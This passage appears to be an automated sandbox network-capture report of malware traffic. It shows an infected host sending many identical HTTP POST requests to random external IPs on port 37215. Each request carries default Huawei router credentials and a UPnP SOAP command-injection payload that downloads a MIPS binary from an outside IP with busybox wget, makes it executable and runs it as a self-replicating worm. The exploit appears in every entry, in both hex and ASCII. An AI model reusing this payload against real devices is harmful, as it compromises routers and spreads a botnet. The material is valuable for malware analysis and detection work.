69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 103.237.87.24 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  481192.168.2.1360472209.45.193.337215
                                                  TimestampBytes transferredDirectionData
                                                  May 24, 2024 10:58:56.117270947 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 32 33 37 2e 38 37 2e 32 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 103.237.87.24 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  482192.168.2.1353604144.83.222.20237215
                                                  TimestampBytes transferredDirectionData
                                                  May 24, 2024 10:58:56.117284060 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 32 33 37 2e 38 37 2e 32 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 103.237.87.24 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  483192.168.2.133482641.72.107.13737215
                                                  TimestampBytes transferredDirectionData
                                                  May 24, 2024 10:58:56.117307901 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 32 33 37 2e 38 37 2e 32 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 103.237.87.24 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  484192.168.2.1351584147.162.176.6237215
                                                  TimestampBytes transferredDirectionData
                                                  May 24, 2024 10:58:56.117316008 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 32 33 37 2e 38 37 2e 32 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 103.237.87.24 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  485192.168.2.135070263.188.110.24437215
                                                  TimestampBytes transferredDirectionData
                                                  May 24, 2024 10:58:56.117330074 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 32 33 37 2e 38 37 2e 32 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 103.237.87.24 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  486192.168.2.134265613.17.83.5637215
                                                  TimestampBytes transferredDirectionData
                                                  May 24, 2024 10:58:56.117331028 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 32 33 37 2e 38 37 2e 32 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 103.237.87.24 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  487192.168.2.135596264.96.80.12237215
                                                  TimestampBytes transferredDirectionData
                                                  May 24, 2024 10:58:56.117355108 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 32 33 37 2e 38 37 2e 32 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 103.237.87.24 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  488192.168.2.1353580191.170.182.937215
                                                  TimestampBytes transferredDirectionData
                                                  May 24, 2024 10:58:56.117355108 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 32 33 37 2e 38 37 2e 32 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 103.237.87.24 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  489192.168.2.133894641.166.46.16137215
                                                  TimestampBytes transferredDirectionData
                                                  May 24, 2024 10:58:56.117372036 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 32 33 37 2e 38 37 2e 32 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 103.237.87.24 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  490192.168.2.1334282157.20.47.19137215
                                                  TimestampBytes transferredDirectionData
                                                  May 24, 2024 10:58:56.118267059 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 32 33 37 2e 38 37 2e 32 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 103.237.87.24 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  491192.168.2.1334072157.108.224.25037215
                                                  TimestampBytes transferredDirectionData
                                                  May 24, 2024 10:58:56.118275881 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
